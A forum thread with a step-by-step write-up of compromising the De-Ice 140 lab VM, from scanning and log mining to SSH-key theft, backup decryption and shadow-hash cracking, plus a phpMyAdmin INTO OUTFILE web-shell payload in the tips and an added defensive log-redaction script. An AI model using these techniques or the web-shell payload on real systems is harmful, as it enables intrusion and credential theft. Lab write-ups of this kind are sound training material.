[Share] write up De-Ice 140 challenge (rooting linux)
#1
Hello, hello, IBT friends,

And finally, after struggling for days in between a very busy work schedule, the De-Ice challenge from om @abdilahrf's thread is done at last.

I don't actually know what the flag for this challenge is, but for me the flag is getting root access on the machine. This challenge can be called penetration testing + Linux privilege escalation, and it is clearly not my background, but so what??

but "I HAVE TO TRY to UNLOCK MY SKILL"

Let's watch the Proof of Concept together. hahahahaha ...............

This De-Ice is series 140, out of 5 other series. Series 140 is the newest De-Ice challenge, which in my opinion has a lot of "curve balls". I run De-Ice in VirtualBox.

First of all, we scan the network.

Code:
Currently scanning: Finished!   |   Screen View: Unique Hosts

2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 120
_____________________________________________________________________________
  IP            At MAC Address      Count  Len   MAC Vendor
-----------------------------------------------------------------------------
192.168.56.100  08:00:27:9f:ab:97    01    060   CADMUS COMPUTER SYSTEMS
192.168.56.101  08:00:27:27:d3:53    01    060   CADMUS COMPUTER SYSTEMS


And the target machine's IP address is 192.168.56.101. Then we enumerate the target using NMAP, "the magic tool", hihihi



Code:
root@5h!n0b!:~# nmap -A -T4 -sV 192.168.56.101

Starting Nmap 6.45 ( http://nmap.org ) at 2014-10-20 10:34 EDT
Nmap scan report for 192.168.56.101
Host is up (0.00034s latency).
Not shown: 993 filtered ports
PORT    STATE  SERVICE  VERSION
21/tcp  open   ftp      ProFTPD 1.3.4a
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
22/tcp  open   ssh      OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 f3:1d:45:3e:f2:38:2f:dc:27:50:8e:b6:78:d5:c4:d2 (DSA)
|   2048 e8:c6:de:08:ee:ab:54:fc:1a:06:62:50:e3:5b:37:22 (RSA)
|_  256 31:22:3f:46:d5:9f:da:43:13:55:2c:49:69:b2:9e:59 (ECDSA)
80/tcp  open   http     Apache httpd 2.2.22 ((Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1)
443/tcp open   ssl/http Apache httpd 2.2.22 ((Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1)
|_http-title: Lazy Admin Corp.
| ssl-cert: Subject: commonName=webhost
| Not valid before: 2014-10-20T09:27:22+00:00
|_Not valid after:  2024-10-17T09:27:22+00:00
|_ssl-date: 2014-10-20T10:35:23+00:00; -4h00m02s from local time.
465/tcp closed smtps
993/tcp open   ssl/imap Dovecot imapd
|_imap-capabilities: more have OK LOGIN-REFERRALS post-login LITERAL+ listed capabilities IMAP4rev1 Pre-login AUTH=PLAIN IDLE ENABLE AUTH=LOGINA0001 $
| ssl-cert: Subject: commonName=webhost
| Not valid before: 2014-10-20T09:27:22+00:00
|_Not valid after:  2024-10-17T09:27:22+00:00
|_ssl-date: 2014-10-20T10:35:23+00:00; -4h00m02s from local time.
995/tcp open   ssl/pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN LOGIN) TOP PIPELINING CAPA USER RESP-CODES UIDL
| ssl-cert: Subject: commonName=webhost
| Not valid before: 2014-10-20T09:27:22+00:00
|_Not valid after:  2024-10-17T09:27:22+00:00
|_ssl-date: 2014-10-20T10:35:23+00:00; -4h00m02s from local time.
MAC Address: 08:00:27:27:D3:53 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.0, Linux 3.0 - 3.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.34 ms 192.168.56.101
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 37.70 seconds


Port 80, HTTP, is interesting to investigate, so use Firefox. When Firefox is launched, we get the web page of Lazy Admin Corp. After looking through and studying the page source, I found nothing. Next, we scan the web directories; you can use dirb or wfuzz.





Code:
root@5h!n0b!:~# wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 https://192.168.56.101/FUZZ/
********************************************************
* Wfuzz  2.0 - The Web Bruteforcer                     *
********************************************************
Target: https://192.168.56.101/FUZZ/
Payload type: file,/usr/share/wfuzz/wordlist/general/common.txt
Total requests: 950
==================================================================
ID     Response   Lines      Word         Chars          Request
==================================================================
00184:  C=403      8 L           22 W         210 Ch       " - cgi-bin"
00295:  C=403      8 L           22 W         206 Ch       " - doc"
00375:  C=200     97 L          525 W        7348 Ch       " - forum"
00424:  C=403      8 L           22 W         208 Ch       " - icons"
00624:  C=200    126 L          465 W        7540 Ch       " - phpmyadmin"
00913:  C=302      0 L            0 W           0 Ch       " - webmail"



To be more certain and to confirm, we use nikto for deeper information gathering:

Code:
root@5h!n0b!:~# nikto -h https://192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject: /CN=webhost
                  Ciphers: DHE-RSA-AES256-GCM-SHA384
                  Issuer:  /CN=webhost
+ Start Time:         2014-10-20 10:58:04 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1
+ Server leaks inodes via ETags, header found with file /, inode: 11996, size: 1782, mtime: Thu Apr 11 13:33:56 2013
+ The anti-clickjacking X-Frame-Options header is not present.
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ mod_ssl/2.2.22 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ OpenSSL/1.0.1 appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4$
+ Hostname '192.168.56.101' does not match certificate's CN 'webhost'
+ mod_ssl/2.2.22 OpenSSL/1.0.1 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OS$
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Cookie PHPSESSID created without the secure flag
+ Cookie PHPSESSID created without the httponly flag
+ Cookie mlf2_usersettings created without the secure flag
+ Cookie mlf2_usersettings created without the httponly flag
+ Cookie mlf2_last_visit created without the secure flag
+ Cookie mlf2_last_visit created without the httponly flag
+ OSVDB-3092: /forum/: This might be interesting...

+ Cookie SQMSESSID created without the secure flag
+ Cookie SQMSESSID created without the httponly flag
+ OSVDB-3093: /webmail/src/read_body.php: SquirrelMail found
+ OSVDB-3233: /icons/README: Apache default file found.


Both nikto and wfuzz found the forum, phpmyadmin and webmail/SquirrelMail directories, so just check them out. The forum page (myLittleforum) in Firefox on the target:


[Image: 5klu7n.jpg]



[Image: 20semgh.jpg]





One of the topics in the forum mentions a hacker attack and a login attack, and as a note, sandy swillard is also raines. It looks good to look into. After going through the thread, it turns out there was an SSH login brute force. It is a headache to go through the entries one by one because there are so many usernames and passwords, so we have to look for the username and password that have logged in via SSH.

So just copy-paste the whole log and use a little bash script to sort/search for the password.
Copy, paste and save it as log.txt.




Code:
root@5h!n0b!:~# grep "invalid user" log.txt | cut -d" " -f9,11 | grep -v "invalid" | sort -u
!DFiuoTkbxtdk0!
adamsa
banterb
bbanter
benedictb
coffeec
genniege
longe
marym
michaelp
mmary
patrickp
pmichael
ppatrick
thompsont
tthompson




There are 17:1 possibilities for the password that was used. Even if the password is found, we still have to find the username that has logged in successfully with all of those passwords. Only mbrown logged in successfully over SSH; see lines 6-7-8 of the screenshot below.




Mar 7 11:15:32 testbox sshd[5775]: Failed password for invalid user benedictb from 10.10.2.131 port 46963 ssh2
Mar 7 11:15:32 testbox sshd[5768]: Failed password for invalid user genniege from 10.10.2.131 port 46488 ssh2
Mar 7 11:15:32 testbox sshd[5775]: Received disconnect from 10.10.2.131: 1a1: Bye Bye [preauth]
Mar 7 11:15:32 testbox sshd[5768]: Received disconnect from 10.10.2.131: 11: Bye Bye [preauth]
Mar 7 11:15:32 testbox sshd[5774]: Connection from 10.0.0.23 port 35155
Mar 7 11:15:32 testbox sshd[5774]: Accepted keyboard-interactive/pam for mbrown from 10.0.0.23 port 35168 ssh2
Mar 7 11:15:32 testbox sshd[5774]: pam_unix(sshd:session): session opened for user mbrown by (uid=0)
Mar 7 11:15:32 testbox sshd[5774]: User child is on pid 5776
Mar 7 11:15:32 testbox sshd[5788]: Set /proc/self/oom_score_adj to 0
Mar 7 11:15:32 testbox sshd[5789]: Set /proc/self/oom_score_adj to 0
Mar 7 11:15:32 testbox sshd[5789]: Connection from 10.10.2.131 port 47972
Mar 7 11:15:32 testbox sshd[5788]: Connection from 10.10.2.131 port 47971



So we try to connect over SSH.
Code:
root@5h!n0b!:~# ssh [email protected]
Permission denied (publickey).
root@5h!n0b!:~# ssh [email protected] - i !DFiuoTkbxtdk0!
bash: !DFiuoTkbxtdk0!: event not found
root@5h!n0b!:~#



It failed; it looks like it needs a public key to log in. Honestly, I was stuck here for 2 days, I didn't know where to go ..

Logging in via FTP was useless too, nothing important inside.

Thinking for a while ............. after 2 days

I realised that I was so STUPIIIIID,,, why not just log in to the forum with the user mbrown and the password/credentials already found?

After looking through mbrown's profile, it lists the email [email protected] with the name mark brown. We still remember that nikto found the /webmail directory, so just try logging in there with the email [email protected] and the same password.



[Image: sbiwlh.jpg]





Here we go, we are in. Check the inbox to find other credential information.

And the MySQL/phpMyAdmin user and password were found.



Code:
From:   [email protected]
Subject:
Date:   Sun, March 10, 2013 10:23 am
To:     [email protected]

Hi,

here are the login-informations for mysql:

Username: root
Password: S4!y.dk)j/_d1pKtX1

Regards,
Sandy






[Image: 11m5h5j.jpg]


After exploring the contents of the database for a while, the user names, passwords (hashes) and their emails show up. It's time to crack the passwords the stupid way: just copy-paste them into Google.




[Image: nr0vut.jpg]






And after the password was cracked, tum-ti-tum, I still could not log in via SSH because I did not have the public key yet, so we try logging in via FTP with the user and password. The first goal is to find the public key for the SSH login.

After logging in, go to the dir ftp/incoming; there is an encrypted file, backup_webhost_130111.tar.gz.enc

Sure, we won't be able to open it without finding the password. Back to the goal, which is finding the public key. After searching for a while, in one of the folders, mbrown/.ssh, downloadkey was found, which is probably its id_rsa.



Code:
root@5h!n0b!:~# ftp 192.168.56.101

Connected to 192.168.56.101.
220 ProFTPD 1.3.4a Server (LazyAdmin corp.) [192.168.56.101]
Name (192.168.56.101:root): rhedley
331 Password required for rhedley
Password:
230 User rhedley logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/rhedley" is the current directory
ftp> cd ..
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x   1 root     root           60 May 13  2013 ftp
drwxrwx---   1 mbrown   mbrown         60 Mar 24  2013 mbrown
drwxrwx---   1 mparker  mparker        40 Apr 11  2013 mparker
drwxrwx---   2 rhedley  rhedley        87 Mar 24  2013 rhedley
drwxr-xr-x   2 1000     1000           36 May 12  2013 sraines
drwxrwx---   5 swillard swillard      128 May 12  2013 swillard
226 Transfer complete
ftp> cd ftp
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
d-wxrwx-wx   1 ftp      ftpadmin       60 Oct 20 14:33 incoming
226 Transfer complete

ftp> cd incoming
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
--w-rwx-w-   1 ftp      ftpuser     47984 Jan 11  2013 backup_webhost_130111.tar.gz.enc
226 Transfer complete
ftp> get backup_webhost_130111.tar.gz.enc
local: backup_webhost_130111.tar.gz.enc remote: backup_webhost_130111.tar.gz.enc
200 PORT command successful
150 Opening BINARY mode data connection for backup_webhost_130111.tar.gz.enc (47984 bytes)
226 Transfer complete
47984 bytes received in 0.00 secs (172277.1 kB/s)
ftp> ls
ftp> ls

200 PORT command successful
150 Opening ASCII mode data connection for file list
--w-rwx-w-   1 ftp      ftpuser     47984 Jan 11  2013 backup_webhost_130111.tar.gz.enc
226 Transfer complete
ftp> cd ..
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
d-wxrwx-wx   1 ftp      ftpadmin       60 Oct 20 14:33 incoming
226 Transfer complete
ftp> cd ..
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x   1 root     root           60 May 13  2013 ftp
drwxrwx---   1 mparker  mparker        40 Apr 11  2013 mparker

drwxrwx---   2 rhedley  rhedley        87 Mar 24  2013 rhedley
drwxr-xr-x   2 1000     1000           36 May 12  2013 sraines
drwxrwx---   5 swillard swillard      128 May 12  2013 swillard
226 Transfer complete
ftp> cd mbrown
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
226 Transfer complete
ftp> cd mbrown/.ssh
550 mbrown/.ssh: No such file or directory
ftp> cd ..
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x   1 root     root           60 May 13  2013 ftp
drwxrwx---   1 mbrown   mbrown         60 Mar 24  2013 mbrown
drwxrwx---   1 mparker  mparker        40 Apr 11  2013 mparker
drwxrwx---   2 rhedley  rhedley        87 Mar 24  2013 rhedley
drwxr-xr-x   2 1000     1000           36 May 12  2013 sraines
drwxrwx---   5 swillard swillard      128 May 12  2013 swillard
226 Transfer complete
ftp> cd mbrown/.ssh
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 mbrown   mbrown       1675 Mar 10  2013 downloadkey
-rw-------   1 mbrown   mbrown       1675 Mar 10  2013 id_rsa

-rw-r--r--   1 mbrown   mbrown        396 Mar 10  2013 id_rsa.pub
226 Transfer complete
ftp> get downloadkey
local: downloadkey remote: downloadkey
200 PORT command successful
150 Opening BINARY mode data connection for downloadkey (1675 bytes)
226 Transfer complete
1675 bytes received in 0.00 secs (1891.0 kB/s)
ftp> exit
221 Goodbye.


Next, change its permissions, and we are ready to log in.


[Image: 11j6wev.jpg]



We explore the shell again, and after poking and looking around there is a suspicious file that cannot be "read" because mbrown does not have "read access". Use getfacl to see who has "read access".

It turns out ftpadmin is the one that has "read access".



Code:
mbrown@webhost:/opt$ ls -l
total 4
-rwxrw----+ 1 root root 654 May 13  2013 backup.sh
mbrown@webhost:/opt$ getfacl backup.sh
# file: backup.sh
# owner: root
# group: root
user::rwx
group::rw-
group:ftpadmin:r--
mask::rw-
other::---




And the ftpadmin members are rhedley and swillard.


Code:
mbrown@webhost:/$ cat /etc/group
root:x:0:
daemon:x:1:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:swillard
audio:x:29:
dip:x:30:
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46
ftpuser:x:997:rhedley,mbrown,ftp
ftpadmin:x:999:rhedley,swillard
sshlogin:x:998:swillard,mbrown





We try to log in over SSH from the "mbrown shell" to the "rhedley shell".

When trying the SSH login for rhedley: permission denied.

And we get another shell when logging in as swillard, then go straight to backup.sh.






Code:
mbrown@webhost:~$ ssh rhedley@localhost
Permission denied (publickey).

mbrown@webhost:~$ ssh swillard@localhost
swillard@webhost:~$

swillard@webhost:~$ cat /opt/backup.sh
#!/bin/bash
## Backup Script
## by SRaines
## Lazy Admin Corp
TMPBACKUP="/tmp/backup";

 
NAME_PREFIX="backup";
NAME_DATE=$(date +%y%m%d);
NAME_HOST=$(/bin/hostname);
FILENAME=${NAME_PREFIX}_${NAME_HOST}_${NAME_DATE}.tar;

[ ! -d ${TMPBACKUP} ] && mkdir -p ${TMPBACKUP}

tar cpf ${TMPBACKUP}/${FILENAME} /etc/fstab /etc/apache2 /etc/hosts /etc/motd /etc/ssh/sshd_config /etc/dovecot /etc/postfix /var/www /home /opt

gzip --best -f ${TMPBACKUP}/${FILENAME}

openssl aes-256-cbc -in ${TMPBACKUP}/${FILENAME}.gz -out ${TMPBACKUP}/${FILENAME}.gz.enc -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs

mv ${TMPBACKUP}/${FILENAME}.gz.enc ./

rm -fr ${TMPBACKUP}
swillard@webhost:~$





It turns out backup.sh stores the password for opening the backup_webhost_130111.tar.gz.enc that we got from FTP earlier, complete with the command ...




Code:
root@5h!n0b!:~# openssl aes-256-cbc -d -in backup_webhost_130111.tar.gz.enc -out backup_webhost_130111.tar.gz -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs

root@5h!n0b!:~# file backup_webhost_130111.tar.gz
backup_webhost_130111.tar.gz: gzip compressed data, was "backup_webhost_130111.tar", from Unix, last modified: Fri Jan 11 17:42:00 2013, max compress$

root@5h!n0b!:~# tar xvzf backup_webhost_130111.tar.gz
etc/
etc/ssh/
etc/ssh/moduli
etc/ssh/ssh_import_id
etc/ssh/ssh_config
etc/ssh/sshd_config
etc/shadow-
etc/security/
etc/security/namespace.init
etc/security/namespace.conf
etc/security/opasswd
etc/security/group.conf
etc/security/access.conf
etc/security/sepermit.conf
etc/security/limits.conf

etc/security/namespace.d/
etc/security/pam_env.conf
etc/security/time.conf
etc/security/capability.conf
etc/security/limits.d/

root@5h!n0b!:~/etc# ls
fstab     gconf  group   grub.d  pass.txt  sasldb2    security  sgml    shadow-  skel  su-to-rootrc  sudoers.d    sysctl.d
gai.conf  groff  group-  hosts   passwd    securetty  services  shadow  shells   ssh   sudoers       sysctl.conf  systemd
root@5h!n0b!:~/etc# cat shadown
cat: shadown: No such file or directory
root@5h!n0b!:~/etc# cat shadow
root:!:15773:0:99999:7:::
daemon:*:15773:0:99999:7:::
bin:*:15773:0:99999:7:::
sync:*:15773:0:99999:7:::

games:*:15773:0:99999:7:::
man:*:15773:0:99999:7:::
lp:*:15773:0:99999:7:::
mail:*:15773:0:99999:7:::
news:*:15773:0:99999:7:::
uucp:*:15773:0:99999:7:::
proxy:*:15773:0:99999:7:::
www-data:*:15773:0:99999:7:::
backup:*:15773:0:99999:7:::
list:*:15773:0:99999:7:::
irc:*:15773:0:99999:7:::
gnats:*:15773:0:99999:7:::
nobody:*:15773:0:99999:7:::
libuuid:!:15773:0:99999:7:::
syslog:*:15773:0:99999:7:::
messagebus:*:15773:0:99999:7:::
whoopsie:*:15773:0:99999:7:::
landscape:*:15773:0:99999:7:::
mysql:!:15773:0:99999:7:::
sshd:*:15773:0:99999:7:::
sraines:$6$4S0pqZzV$t91VbUY8ActvkS3717wllrv8ExZO/ZSHDIakHmPCvwzedKt2qDRh7509Zhk45QkKEMYPPwP7PInpp6WAJYwvk1:15773:0:99999:7:::
mbrown:$6$DhcTFbl/$GcvUMLKvsybo4uXaS6Wx08rCdk6dPfYXASXzahAHlgy8A90PfwdoJXXyXZluw95aQeTGrjWF2zYPR0z2bX4p31:15773:0:99999:7:::
rhedley:$6$PpzRSzPO$0MhuP.G1pCB3Wc1zAzFSTSnOnEeuJm5kbXUGmlAwH2Jz1bFJU/.ZPwsheyyt4hrtMvZ/k6wT38hXYZcWY2ELV/:15773:0:99999:7:::


Then the last step is to crack the passwords of those three admins. In this case I cracked them using john in combination with darkc0de.lst; you can see how long it took and how hard the struggle was to get the root password.

And finally, after almost 4 hours, the password was cracked ....




[Image: 2m4dee0.jpg]





[Image: 2nkj88z.jpg]



GAME OVER 
mission complete






NEED TO KNOW:

1. The journey to get root access was actually more complicated; this write-up is written concisely so that it is easy to understand and learn from.

2. Many exploits were tried, from my little forum exploits to Linux kernel ones, and it turned out that many of them did not work well.

3. A trick for getting another shell: you can use PHP code execution in phpMyAdmin (SELECT " < ? system($_REQUEST['cmd']); ? > " INTO OUTFILE "/var/www/template_c/cmd.php") with the help of netcat to get an interactive shell.

4. A question for all of us: "HAVE YOU TRIED HARDER !! to UNLOCK YOUR SKILL". If not yet, then you have to try .. and good luck trying, don't forget to have bodrex or poldanmig ready ha...ha...ha..ha

5. Because I am "wong Solo" (from Solo), this write-up is dedicated to the Solo regional chapter that has not been formed yet ha..ha..ha..ha..ha, hoping it gets formed soon.

Thanks for reading my write-up of the De-Ice challenge 104. If you have any questions, do not hesitate to contact/add me here.
The wrong way to commemorate Kartini Day: emulate her spirit of nationalism and her emancipation, not the way she dressed.
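
Added example, not part of the original post: the grep step in the write-up works because a password typed at the SSH username prompt is written to the auth log in clear text as an "invalid user". This Python sketch looks at the same pattern from the defender's side, flagging accounts whose password is probably sitting in the log and redacting such entries before an excerpt is shared; the sample log, the password-like string in it and all function names are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample in the sshd syslog format quoted in the post; the
# password-like string and the timings are made up for this example.
SAMPLE_LOG = """\
Mar 7 11:15:30 testbox sshd[5768]: Failed password for invalid user genniege from 10.10.2.131 port 46488 ssh2
Mar 7 11:15:31 testbox sshd[5770]: Failed password for invalid user Ex4mple!Pass#9 from 10.0.0.23 port 35150 ssh2
Mar 7 11:15:32 testbox sshd[5775]: Failed password for invalid user benedictb from 10.10.2.131 port 46963 ssh2
Mar 7 11:15:40 testbox sshd[5774]: Accepted keyboard-interactive/pam for mbrown from 10.0.0.23 port 35168 ssh2
Mar 7 11:20:00 testbox sshd[5790]: Failed password for invalid user admin from 10.10.2.131 port 47972 ssh2
"""

PREFIX = r"^(\w{3}\s+\d+\s[\d:]{8}) \S+ sshd\[\d+\]: "
FAILED = re.compile(PREFIX + r"Failed password for invalid user (\S+) from (\S+) port")
ACCEPTED = re.compile(PREFIX + r"Accepted \S+ for (\S+) from (\S+) port")
INVALID_USER = re.compile(r"(invalid user )(\S+)( from )")


def parse_ts(stamp):
    # Syslog timestamps carry no year; pin one so values can be compared.
    return datetime.strptime("2000 " + stamp, "%Y %b %d %H:%M:%S")


def looks_like_password(name):
    """Heuristic: at least 8 characters mixing three or more character classes."""
    classes = (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]")
    return len(name) >= 8 and sum(bool(re.search(c, name)) for c in classes) >= 3


def mask(secret):
    # Never copy the secret itself into an alert.
    return f"{secret[0]}***({len(secret)} chars)"


def find_exposed_passwords(log_text, window=timedelta(minutes=5)):
    """Pair a password-like 'invalid user' name with a later successful login
    from the same address: that account's password is probably in the log."""
    suspects, findings = [], []
    for line in log_text.splitlines():
        failed = FAILED.match(line)
        if failed:
            stamp, name, source = failed.groups()
            if looks_like_password(name):
                suspects.append((parse_ts(stamp), source, name))
            continue
        accepted = ACCEPTED.match(line)
        if accepted:
            stamp, account, source = accepted.groups()
            when = parse_ts(stamp)
            for seen, suspect_source, name in suspects:
                if suspect_source == source and timedelta(0) <= when - seen <= window:
                    findings.append((account, source, mask(name)))
    return findings


def redact(log_text):
    """Scrub password-like names before a log excerpt leaves the host."""
    def scrub(match):
        name = match.group(2)
        shown = "<redacted>" if looks_like_password(name) else name
        return match.group(1) + shown + match.group(3)
    return "\n".join(INVALID_USER.sub(scrub, line) for line in log_text.splitlines())


if __name__ == "__main__":
    print(find_exposed_passwords(SAMPLE_LOG))
    print(redact(SAMPLE_LOG))
```

Any account this reports should have its password rotated, since everyone who can read the log (or a pasted copy of it) can read the password.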

#2
Awesooome, kang.... greaaat...... this game is worth trying... Nice share, kang...

#3
Wow,... this is a nice menu for the ghost hour,.. better than sitting idle,... :v
Nice share, bro....
+ from me,..

#4
Whoa.. scary stuff.. bro, that journey is really great, from not having the pass yet until getting it (y)

#5
Cool, om
I want to try it too, hehe, I want to learn more about CTF

#6
I'm reposting this post to the jabodetabek blog, OK? ,, cool (Y)





